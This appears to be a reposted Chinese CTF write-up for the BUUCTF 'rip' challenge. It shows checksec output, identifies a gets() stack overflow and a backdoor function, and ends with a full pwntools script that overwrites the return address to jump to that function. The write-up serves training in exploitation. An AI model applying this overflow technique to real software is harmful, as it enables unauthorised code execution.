[BUU-WriteUp]rip
作者:互联网
rip
使用checksec查看:
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q0zlaOVX-1645757364144)(rip.assets/image-20220225104328732.png)]](https://www.icode9.com/i/ll/?i=c930676f56304136bb64a9c714363a36.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBzd2F5,size_20,color_FFFFFF,t_70,g_se,x_16)
保护措施全部关闭。
放进IDA中分析:
gets():存在栈溢出
fun():
- 存在后门函数
步骤解析
s 距离 rbp
0xF,无canary,直接覆盖即可
完整exp
from pwn import *
p = process("../buu/rip")
# p = remote("node4.buuoj.cn",27965)
elf = ELF("../buu/rip")
fun_addr = elf.symbols['fun']
payload = b'M' * (0xF + 8) + p64(fun_addr-1) +p64(fun_addr)
p.sendline(payload)
p.interactive()
标签:addr,..,WriteUp,elf,rip,BUU,fun,payload 来源: https://blog.csdn.net/m0sway/article/details/123128113